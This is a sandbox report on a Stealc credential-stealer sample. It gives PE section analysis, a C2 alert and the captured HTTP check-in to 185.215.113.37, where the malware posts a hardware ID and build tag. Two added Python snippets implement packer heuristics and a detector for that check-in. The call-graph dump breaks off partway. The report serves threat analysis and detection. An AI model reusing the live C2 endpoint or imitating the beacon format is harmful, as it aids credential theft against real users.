                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 86
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe
                            No simulations
IP context for 185.215.113.37 (other samples seen contacting this IP):
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.37/e2b1563c6670f193.php
                            No context
ASN context for WHOLESALECONNECTIONSNL (other samples seen contacting this ASN):
Associated Sample Name / URL | Detection | Threat Name | Context
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 185.215.113.16
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.16
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.947854852523852
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'911'808 bytes
                            MD5:de1624f6c5d98d559c64c9c30359b942
                            SHA1:b02c82eeb4d1e7b768633ef276f182b653db29fc
                            SHA256:3a98e0f2785d57188cab067e1c48a2355d69212f432380d94315db75d1be30ce
                            SHA512:804cba17f917d2e96d6da73df0effe38548970d187da02b8e35f13bdb8ea144aa2b5f2d04a909290d64c01b332cff3418bfb949419fd1e40c4b107100ca86ebd
                            SSDEEP:49152:wCU6bxg4GWZLVkWdnFjfrqFoG+dgRo50CHvpTHv8M:wCU6bW4GukhR7CHa
                            TLSH:6195331C4B65C735DED51279A7B714D4EBF9CF622BEA496BCE39813842C38883345AE0
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0xac7000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction at entry point: jmp 00007F2A68E0D7EAh
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(name blank in report) | 0x1000 | 0x25b000 | 0x22800 | c0f6193c923c9f934bee92c25548c491 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(name blank in report) | 0x25e000 | 0x2bb000 | 0x200 | e42f9513660ce256b57eb9013c8b7ce8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
sacriosm | 0x519000 | 0x1ad000 | 0x1aca00 | 904170064b081c41be2ceac36277faed | False | 0.9950929799139691 | data | 7.954815877107788 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bxtvqvzl | 0x6c6000 | 0x1000 | 0x400 | 67e97bb3b3c59faa2dbfe2cc3ea0e4fe | False | 0.7353515625 | data | 6.095704241402358 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6c7000 | 0x3000 | 0x2200 | 0b62b2d2033ce3729c52e031602097e4 | False | 0.06456801470588236 | DOS executable (COM) | 0.7040644891945353 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
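As an added triage example (not part of the Joe Sandbox report and not Joe Sandbox's own detection logic), the following Python applies the checks behind several of the signatures listed at the top of the report ("Entry point lies outside standard sections", "PE file contains section with special chars", "Detected unpacking (changes PE section rights)") to the section table above. The section values and header fields are copied from the report; the list of "normal" code section names and the thresholds (entropy above 7.0, virtual size at least eight times the raw size, 64 KiB minimum) are my own assumptions.

```python
from dataclasses import dataclass
from typing import List, Optional

# Values copied from the static report above (image base 0x400000, entry point VA 0xac7000,
# file size 1'911'808 bytes) and its section table; entropy is None where the report shows
# "unknown". Constructed as plain data so the checks run without the sample or a PE library.
IMAGE_BASE = 0x400000
ENTRY_POINT_VA = 0xAC7000
FILE_SIZE = 1_911_808
RWX = "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE"
RW = "IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE"


@dataclass
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    entropy: Optional[float]
    characteristics: str


SECTIONS = [
    Section("", 0x1000, 0x25B000, 0x22800, None, RWX),
    Section(".rsrc", 0x25C000, 0x1000, 0x0, 0.0, RW),
    Section(".idata", 0x25D000, 0x1000, 0x200, 0.906, RW),
    Section("", 0x25E000, 0x2BB000, 0x200, None, RWX),
    Section("sacriosm", 0x519000, 0x1AD000, 0x1ACA00, 7.955, RWX),
    Section("bxtvqvzl", 0x6C6000, 0x1000, 0x400, 6.096, RWX),
    Section(".taggant", 0x6C7000, 0x3000, 0x2200, 0.704, RWX),
]

# Names a linker normally gives the section that holds the entry point (assumption: list is mine).
CODE_SECTION_NAMES = {".text", "CODE", ".code", "text", ".init"}
# Thresholds are assumptions, not values taken from the report.
HIGH_ENTROPY = 7.0          # 8-bit entropy; packed or encrypted data sits close to 8.0
VIRTUAL_ONLY_RATIO = 8      # virtual size this many times the raw size => filled at runtime
VIRTUAL_ONLY_MIN = 0x10000  # ignore tiny sections such as a 4 KiB .rsrc when applying the ratio


def section_for_rva(rva: int, sections: List[Section]) -> Optional[Section]:
    """Return the section whose virtual range contains rva, or None (headers/overlay)."""
    for s in sections:
        if s.virtual_address <= rva < s.virtual_address + s.virtual_size:
            return s
    return None


def section_rules(s: Section) -> List[str]:
    """Per-section checks; returns the names of the rules that fired."""
    fired = []
    flags = set(s.characteristics.split(", "))
    if not s.name or not all(c.isalnum() or c in "._$" for c in s.name):
        fired.append("special_or_empty_name")
    if {"IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_WRITE"} <= flags:
        fired.append("rwx_section")
    if s.virtual_size >= VIRTUAL_ONLY_MIN and s.virtual_size >= VIRTUAL_ONLY_RATIO * max(s.raw_size, 1):
        fired.append("virtual_only_region")
    if s.entropy is not None and s.entropy > HIGH_ENTROPY:
        fired.append("high_entropy")
    return fired


def triage(sections: List[Section], image_base: int, entry_va: int, file_size: int) -> dict:
    """Apply the header and section checks and return a summary suitable for scoring."""
    ep = section_for_rva(entry_va - image_base, sections)
    last = max(sections, key=lambda s: s.virtual_address)
    return {
        "entry_point_section": ep.name if ep else None,
        "entry_point_outside_code": ep is None or ep.name not in CODE_SECTION_NAMES,
        "image_size": last.virtual_address + last.virtual_size,  # what the loader must map
        "file_size": file_size,
        "sections": [(s.name, section_rules(s)) for s in sections],
    }


def count_rule(report: dict, rule: str) -> int:
    """How many sections triggered the given rule."""
    return sum(rule in rules for _, rules in report["sections"])


if __name__ == "__main__":
    for key, value in triage(SECTIONS, IMAGE_BASE, ENTRY_POINT_VA, FILE_SIZE).items():
        print(key, value)
```

On this sample the entry point RVA 0x6c7000 falls in `.taggant`, five of seven sections are writable and executable, both blank-named sections are many times larger in memory than on disk (the second one is 0x2bb000 bytes virtual against 0x200 bytes raw), and `sacriosm` carries the high-entropy payload; the mapped image is about 7.1 MB for a 1.9 MB file, which is the footprint of a packer that unpacks into reserved virtual space.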
DLL | Import
kernel32.dll | lstrcpy
The static import table holds only this single entry; the rest of the API set is resolved at runtime through LoadLibraryA/GetProcAddress (see the execution graph below).
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-23T20:55:05.940663+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 23, 2024 20:55:04.723707914 CEST | 49699 | 80 | 192.168.2.7 | 185.215.113.37
Oct 23, 2024 20:55:04.730773926 CEST | 80 | 49699 | 185.215.113.37 | 192.168.2.7
Oct 23, 2024 20:55:04.730959892 CEST | 49699 | 80 | 192.168.2.7 | 185.215.113.37
Oct 23, 2024 20:55:04.731997967 CEST | 49699 | 80 | 192.168.2.7 | 185.215.113.37
Oct 23, 2024 20:55:04.737562895 CEST | 80 | 49699 | 185.215.113.37 | 192.168.2.7
Oct 23, 2024 20:55:05.647269964 CEST | 80 | 49699 | 185.215.113.37 | 192.168.2.7
Oct 23, 2024 20:55:05.647363901 CEST | 49699 | 80 | 192.168.2.7 | 185.215.113.37
Oct 23, 2024 20:55:05.649559975 CEST | 49699 | 80 | 192.168.2.7 | 185.215.113.37
Oct 23, 2024 20:55:05.656814098 CEST | 80 | 49699 | 185.215.113.37 | 192.168.2.7
Oct 23, 2024 20:55:05.940581083 CEST | 80 | 49699 | 185.215.113.37 | 192.168.2.7
Oct 23, 2024 20:55:05.940663099 CEST | 49699 | 80 | 192.168.2.7 | 185.215.113.37
Oct 23, 2024 20:55:07.636113882 CEST | 49699 | 80 | 192.168.2.7 | 185.215.113.37
Contacted HTTP host: 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | 6448 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 20:55:04.731997967 CEST | 89 | OUT |
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache

Oct 23, 2024 20:55:05.647269964 CEST | 203 | IN |
HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 18:55:05 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Oct 23, 2024 20:55:05.649559975 CEST | 412 | OUT |
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGH
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 31 38 30 31 45 34 43 42 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 2d 2d 0d 0a
Data Ascii (CRLF line breaks restored from the raw bytes):
------IDBKKKKKFBGDGDHIDBGH
Content-Disposition: form-data; name="hwid"

CD1801E4CB7B1953448019
------IDBKKKKKFBGDGDHIDBGH
Content-Disposition: form-data; name="build"

doma
------IDBKKKKKFBGDGDHIDBGH--

Oct 23, 2024 20:55:05.940581083 CEST | 210 | IN |
HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 18:55:05 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s= (base64 of the string "block"; no further C2 traffic follows in this session)
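As an added example (not part of the Joe Sandbox report), the following Python re-assembles the POST above from its recorded bytes, parses the multipart body, extracts the hwid and build fields and decodes the reply. The C2 path pattern (/<16 hex digits>.php) and the "exactly the fields hwid and build" rule are heuristics taken from this capture and from the other reports listed for the same IP, not a documented protocol; treat them as assumptions when reusing the classifier.

```python
import base64
import re

# Constructed from the HTTP session recorded above (the POST headers, its "Data Raw" body and
# the C2 reply body), re-assembled as one raw HTTP request so the parser runs offline.
CHECKIN_REQUEST = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGH\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 211\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"------IDBKKKKKFBGDGDHIDBGH\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"CD1801E4CB7B1953448019\r\n"
    b"------IDBKKKKKFBGDGDHIDBGH\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"doma\r\n"
    b"------IDBKKKKKFBGDGDHIDBGH--\r\n"
)
CHECKIN_REPLY_BODY = b"YmxvY2s="

# Heuristic (assumption): the gate path seen in this and the related reports is 16 hex chars + .php.
C2_PATH_RE = re.compile(r"^/[0-9a-f]{16}\.php$")


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body); header names lower-cased."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].decode("ascii").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field name: value bytes} for a multipart/form-data body."""
    delimiter = b"--" + boundary.encode("ascii")
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):          # "--boundary--" closes the body
            break
        part = part[2:] if part.startswith(b"\r\n") else part
        part_headers, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"', part_headers)
        if m:
            # the CRLF before the next delimiter belongs to the delimiter, not to the value
            fields[m.group(1).decode("ascii")] = value.removesuffix(b"\r\n")
    return fields


def classify_stealc_checkin(raw: bytes):
    """Return {hwid, build, c2} for a request shaped like the check-in above, else None."""
    method, path, headers, body = parse_http_request(raw)
    if method != "POST" or not C2_PATH_RE.match(path):
        return None
    ctype = headers.get("content-type", "")
    m = re.search(r"boundary=([^;\s]+)", ctype)
    if not ctype.startswith("multipart/form-data") or not m:
        return None
    if int(headers.get("content-length", "-1")) != len(body):
        return None                          # truncated or padded body: do not trust the fields
    fields = parse_multipart(body, m.group(1))
    if set(fields) != {"hwid", "build"}:
        return None
    return {
        "hwid": fields["hwid"].decode("ascii", "replace"),
        "build": fields["build"].decode("ascii", "replace"),
        "c2": f"http://{headers.get('host', '')}{path}",
    }


def decode_reply(body: bytes) -> str:
    """Decode the base64 text the C2 answered with (strict: non-base64 bytes raise)."""
    return base64.b64decode(body, validate=True).decode("ascii")


if __name__ == "__main__":
    print(classify_stealc_checkin(CHECKIN_REQUEST))
    print(decode_reply(CHECKIN_REPLY_BODY))
```

The Content-Length check is deliberate: the recorded request declares 211 body bytes and carries exactly 211, and a request where the two disagree is either cut short by the capture or not this client, so the extracted fields would not be trustworthy as indicators. Decoding the 8-byte reply yields "block", which is the last thing the server sends before the session ends.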


                            Target ID:0
                            Start time:14:55:00
                            Start date:23/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0xfb0000
                            File size:1'911'808 bytes
                            MD5 hash:DE1624F6C5D98D559C64C9C30359B942
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1291738753.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1251438236.0000000005340000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true


                              Execution Graph

                              Execution Coverage:7.4%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:10.1%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:24
execution_graph (the rendered call graph, flattened to node/edge text; only the API-bearing nodes are kept here, in the order the graph links them, with addresses in the relocated image at base 0xfb0000):
• fb2260 and fb26a0: long chains of calls into fb45c0 (RtlAllocateHeap, VirtualProtect).
• fc9860 -> fc9750 (GetPEB) -> fc9a93: LoadLibraryA x5, then GetProcAddress at fc9af4, fc9b16, fc9b4f, fc9b71 and fc9b92 (runtime import resolution).
• fc6a00 -> fca740 (lstrcpy) -> fb11d0: fb1160 GetSystemInfo with an ExitProcess branch (fb117c); fb1110 GetCurrentProcess, VirtualAllocExNuma with an ExitProcess branch (fb1141); fb10a0 VirtualAlloc, VirtualFree; fc89b0 GlobalMemoryStatusEx -> __aulldiv with an ExitProcess branch (fb1292); fc6770 GetUserDefaultLangID with five ExitProcess branches (fc67a3, fc67ad, fc67b7, fc67c1, fc67cb).
• fc7850: GetProcessHeap, RtlAllocateHeap, GetUserNameA; fc78e0: GetProcessHeap, RtlAllocateHeap, GetComputerNameA; fca9b0: lstrlen, lstrcpy, lstrcat.
• fc6920: GetSystemTime -> fc6820 (lstrcpy chain) -> sscanf -> SystemTimeToFileTime x2, with an ExitProcess branch (fc69d8).
• fc6ac2: OpenEventA, branching to either CloseHandle and Sleep (fc6af5) or CreateEventA (fc6ae1).
• fc5b10 onward: fca820 (lstrlen, lstrcpy) and fc6430 chains, fc7500 GetWindowsDirectoryA, then fb4880, fc17a0, fb5960 (34 API calls), fc1050, fc0d90, fc0f40, fc1a10, fb4fb0 (GetProcessHeap, RtlAllocateHeap, InternetOpenA) and fc0740.
The graph text is cut off at node 14167 (fb35be), inside the fb26a0 allocation chain.
14166->14167 14168 fb45c0 2 API calls 14167->14168 14169 fb35d7 14168->14169 14170 fb45c0 2 API calls 14169->14170 14171 fb35f0 14170->14171 14172 fb45c0 2 API calls 14171->14172 14173 fb3609 14172->14173 14174 fb45c0 2 API calls 14173->14174 14175 fb3622 14174->14175 14176 fb45c0 2 API calls 14175->14176 14177 fb363b 14176->14177 14178 fb45c0 2 API calls 14177->14178 14179 fb3654 14178->14179 14180 fb45c0 2 API calls 14179->14180 14181 fb366d 14180->14181 14182 fb45c0 2 API calls 14181->14182 14183 fb3686 14182->14183 14184 fb45c0 2 API calls 14183->14184 14185 fb369f 14184->14185 14186 fb45c0 2 API calls 14185->14186 14187 fb36b8 14186->14187 14188 fb45c0 2 API calls 14187->14188 14189 fb36d1 14188->14189 14190 fb45c0 2 API calls 14189->14190 14191 fb36ea 14190->14191 14192 fb45c0 2 API calls 14191->14192 14193 fb3703 14192->14193 14194 fb45c0 2 API calls 14193->14194 14195 fb371c 14194->14195 14196 fb45c0 2 API calls 14195->14196 14197 fb3735 14196->14197 14198 fb45c0 2 API calls 14197->14198 14199 fb374e 14198->14199 14200 fb45c0 2 API calls 14199->14200 14201 fb3767 14200->14201 14202 fb45c0 2 API calls 14201->14202 14203 fb3780 14202->14203 14204 fb45c0 2 API calls 14203->14204 14205 fb3799 14204->14205 14206 fb45c0 2 API calls 14205->14206 14207 fb37b2 14206->14207 14208 fb45c0 2 API calls 14207->14208 14209 fb37cb 14208->14209 14210 fb45c0 2 API calls 14209->14210 14211 fb37e4 14210->14211 14212 fb45c0 2 API calls 14211->14212 14213 fb37fd 14212->14213 14214 fb45c0 2 API calls 14213->14214 14215 fb3816 14214->14215 14216 fb45c0 2 API calls 14215->14216 14217 fb382f 14216->14217 14218 fb45c0 2 API calls 14217->14218 14219 fb3848 14218->14219 14220 fb45c0 2 API calls 14219->14220 14221 fb3861 14220->14221 14222 fb45c0 2 API calls 14221->14222 14223 fb387a 14222->14223 14224 fb45c0 2 API calls 14223->14224 14225 fb3893 14224->14225 14226 fb45c0 2 API calls 14225->14226 14227 fb38ac 14226->14227 14228 fb45c0 2 API calls 14227->14228 14229 fb38c5 14228->14229 
14230 fb45c0 2 API calls 14229->14230 14231 fb38de 14230->14231 14232 fb45c0 2 API calls 14231->14232 14233 fb38f7 14232->14233 14234 fb45c0 2 API calls 14233->14234 14235 fb3910 14234->14235 14236 fb45c0 2 API calls 14235->14236 14237 fb3929 14236->14237 14238 fb45c0 2 API calls 14237->14238 14239 fb3942 14238->14239 14240 fb45c0 2 API calls 14239->14240 14241 fb395b 14240->14241 14242 fb45c0 2 API calls 14241->14242 14243 fb3974 14242->14243 14244 fb45c0 2 API calls 14243->14244 14245 fb398d 14244->14245 14246 fb45c0 2 API calls 14245->14246 14247 fb39a6 14246->14247 14248 fb45c0 2 API calls 14247->14248 14249 fb39bf 14248->14249 14250 fb45c0 2 API calls 14249->14250 14251 fb39d8 14250->14251 14252 fb45c0 2 API calls 14251->14252 14253 fb39f1 14252->14253 14254 fb45c0 2 API calls 14253->14254 14255 fb3a0a 14254->14255 14256 fb45c0 2 API calls 14255->14256 14257 fb3a23 14256->14257 14258 fb45c0 2 API calls 14257->14258 14259 fb3a3c 14258->14259 14260 fb45c0 2 API calls 14259->14260 14261 fb3a55 14260->14261 14262 fb45c0 2 API calls 14261->14262 14263 fb3a6e 14262->14263 14264 fb45c0 2 API calls 14263->14264 14265 fb3a87 14264->14265 14266 fb45c0 2 API calls 14265->14266 14267 fb3aa0 14266->14267 14268 fb45c0 2 API calls 14267->14268 14269 fb3ab9 14268->14269 14270 fb45c0 2 API calls 14269->14270 14271 fb3ad2 14270->14271 14272 fb45c0 2 API calls 14271->14272 14273 fb3aeb 14272->14273 14274 fb45c0 2 API calls 14273->14274 14275 fb3b04 14274->14275 14276 fb45c0 2 API calls 14275->14276 14277 fb3b1d 14276->14277 14278 fb45c0 2 API calls 14277->14278 14279 fb3b36 14278->14279 14280 fb45c0 2 API calls 14279->14280 14281 fb3b4f 14280->14281 14282 fb45c0 2 API calls 14281->14282 14283 fb3b68 14282->14283 14284 fb45c0 2 API calls 14283->14284 14285 fb3b81 14284->14285 14286 fb45c0 2 API calls 14285->14286 14287 fb3b9a 14286->14287 14288 fb45c0 2 API calls 14287->14288 14289 fb3bb3 14288->14289 14290 fb45c0 2 API calls 14289->14290 14291 fb3bcc 14290->14291 14292 fb45c0 2 
API calls 14291->14292 14293 fb3be5 14292->14293 14294 fb45c0 2 API calls 14293->14294 14295 fb3bfe 14294->14295 14296 fb45c0 2 API calls 14295->14296 14297 fb3c17 14296->14297 14298 fb45c0 2 API calls 14297->14298 14299 fb3c30 14298->14299 14300 fb45c0 2 API calls 14299->14300 14301 fb3c49 14300->14301 14302 fb45c0 2 API calls 14301->14302 14303 fb3c62 14302->14303 14304 fb45c0 2 API calls 14303->14304 14305 fb3c7b 14304->14305 14306 fb45c0 2 API calls 14305->14306 14307 fb3c94 14306->14307 14308 fb45c0 2 API calls 14307->14308 14309 fb3cad 14308->14309 14310 fb45c0 2 API calls 14309->14310 14311 fb3cc6 14310->14311 14312 fb45c0 2 API calls 14311->14312 14313 fb3cdf 14312->14313 14314 fb45c0 2 API calls 14313->14314 14315 fb3cf8 14314->14315 14316 fb45c0 2 API calls 14315->14316 14317 fb3d11 14316->14317 14318 fb45c0 2 API calls 14317->14318 14319 fb3d2a 14318->14319 14320 fb45c0 2 API calls 14319->14320 14321 fb3d43 14320->14321 14322 fb45c0 2 API calls 14321->14322 14323 fb3d5c 14322->14323 14324 fb45c0 2 API calls 14323->14324 14325 fb3d75 14324->14325 14326 fb45c0 2 API calls 14325->14326 14327 fb3d8e 14326->14327 14328 fb45c0 2 API calls 14327->14328 14329 fb3da7 14328->14329 14330 fb45c0 2 API calls 14329->14330 14331 fb3dc0 14330->14331 14332 fb45c0 2 API calls 14331->14332 14333 fb3dd9 14332->14333 14334 fb45c0 2 API calls 14333->14334 14335 fb3df2 14334->14335 14336 fb45c0 2 API calls 14335->14336 14337 fb3e0b 14336->14337 14338 fb45c0 2 API calls 14337->14338 14339 fb3e24 14338->14339 14340 fb45c0 2 API calls 14339->14340 14341 fb3e3d 14340->14341 14342 fb45c0 2 API calls 14341->14342 14343 